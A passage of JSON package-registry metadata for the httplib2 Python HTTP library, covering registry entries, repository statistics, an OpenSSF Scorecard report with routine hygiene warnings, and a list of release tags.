dependent_packages_count":6.6694456023343065,"stargazers_count":10.226483256912603,"forks_count":7.16965402250938,"average":6.016395720439072},"purl":"pkg:spack/py-httplib2","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/spack/py-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/spack/py-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/spack/py-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-20T11:37:11.797Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-httplib2/codemeta","maintainers":[{"uuid":"adamjstewart","login":"adamjstewart","name":null,"email":null,"url":"https://github.com/adamjstewart","packages_count":2153,"html_url":null,"role":null,"created_at":"2022-11-14T16:51:46.225Z","updated_at":"2022-11-14T16:51:46.225Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/maintainers/adamjstewart/packages"}],"registry":{"name":"spack.io","url":"https://packages.spack.io","ecosystem":"spack","default":true,"packages_count":9303,"maintainers_count":1032,"namespaces_count":0,"keywords_count":3991,"github":"spack","metadata":{"funded_packages_count":511},"icon_url":"https://github.com/spack.png","created_at":"2022-04-04T15:19:23.514Z","updated_at":"2026-08-25T05:07:25.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/namespaces"}},{"id":4109500,"name":"github.com/httplib2/httplib2","ecosystem":"go","description":"","homepage":null,"licenses":"other","normalized_licenses":["Other"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"github.com/httplib2","versions_count":39,"first_release_published_at":"2015-04-11T13:50:15.000Z","latest_release_published_at":"2026-06-26T10:07:36.000Z","latest_release_number":"v0.32.0","last_synced_at":"2026-08-24T14:03:21.951Z","created_at":"2022-04-12T13:58:55.621Z","updated_at":"2026-08-24T14:03:21.951Z","registry_url":"https://pkg.go.dev/github.com/httplib2/httplib2","install_command":"go get github.com/httplib2/httplib2","documentation_url":"https://pkg.go.dev/github.com/httplib2/httplib2#section-documentation","metadata":{},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"